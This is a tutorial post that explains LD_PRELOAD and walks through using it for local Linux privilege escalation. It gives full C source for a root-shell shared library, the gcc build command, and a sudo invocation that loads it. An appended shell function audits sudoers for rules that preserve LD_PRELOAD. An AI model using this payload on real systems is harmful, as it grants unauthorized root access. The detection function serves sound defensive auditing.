Linux Privilege Escalation Using LD_PRELOAD

LD_PRELOAD is an environment variable in Linux that allows users to load custom shared libraries before any other libraries during the execution of a program. Attackers can exploit this feature to inject malicious code and potentially escalate privileges, especially if the target program is executed with elevated permissions (e.g., as root).

How LD_PRELOAD Works

  1. Purpose: LD_PRELOAD is used for debugging or testing by overriding functions in shared libraries.
  2. Mechanism: When a program is executed, the dynamic linker checks the LD_PRELOAD variable for a shared library path. If specified, this library is loaded before others, allowing its functions to override standard library functions.

Privilege Escalation


Let’s generate a C program file inside the /tmp directory.

C Program File Example

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* declares setgid() and setuid() */

/* _init runs when the dynamic linker loads this library. Defining it
   ourselves only works because the object is built with -nostartfiles,
   which leaves out the crti.o that would otherwise provide _init. */
void _init() {
    unsetenv("LD_PRELOAD");  /* keep the spawned shell from preloading this library again */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Save it as shell.c inside /tmp.

Compiling the Shell Program

Next, compile it to generate a shared object with a .so extension, similar to a .dll file in the Windows operating system. Enter the following command:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Check the generated file:

ls -al shell.so

Now execute the find command with LD_PRELOAD set to the path of the shared object:

sudo LD_PRELOAD=/tmp/shell.so find

To verify the privileges, run:

id
whoami

And finally, you should have obtained root privileges! 😉
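The sudo step above only succeeds when sudo is configured to pass LD_PRELOAD through: by default env_reset drops every LD_* variable, so a sudoers rule must keep it (env_keep), or the rule must carry the SETENV tag or the setenv option. The following audit function is an added example, not part of the original post; it reads sudoers text from stdin, prints any line that preserves LD_PRELOAD or LD_LIBRARY_PATH, and returns 1 if one is found. The sample sudoers lines in the comments are constructed.

```shell
#!/bin/sh
# Added example: flag sudoers rules that let LD_PRELOAD survive sudo.
# On a real host run it as:  sudoers_ld_preload_risk < /etc/sudoers
# and repeat for each file in /etc/sudoers.d/ (validate with visudo -c).
# Lines it reports, e.g. (constructed samples):
#   Defaults env_keep += "LD_PRELOAD"
#   user ALL=(ALL) SETENV: /usr/bin/find
#   Defaults setenv
# Lines it ignores: env_keep -= "LD_PRELOAD", Defaults !setenv, comments.

sudoers_ld_preload_risk() {
    # Strip comments first so commented-out rules are not reported.
    risky=$(sed 's/#.*$//' | grep -E \
        -e 'env_keep[[:space:]]*\+?=.*LD_(PRELOAD|LIBRARY_PATH)' \
        -e '[[:space:]:]SETENV:' \
        -e 'Defaults.*[[:space:],]setenv([[:space:],]|$)' \
        || true)
    if [ -n "$risky" ]; then
        printf '%s\n' "$risky"
        return 1
    fi
    return 0
}
```

A clean result (return 0) means the library in this post would be discarded by sudo's environment sanitisation before find runs.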

Resources:
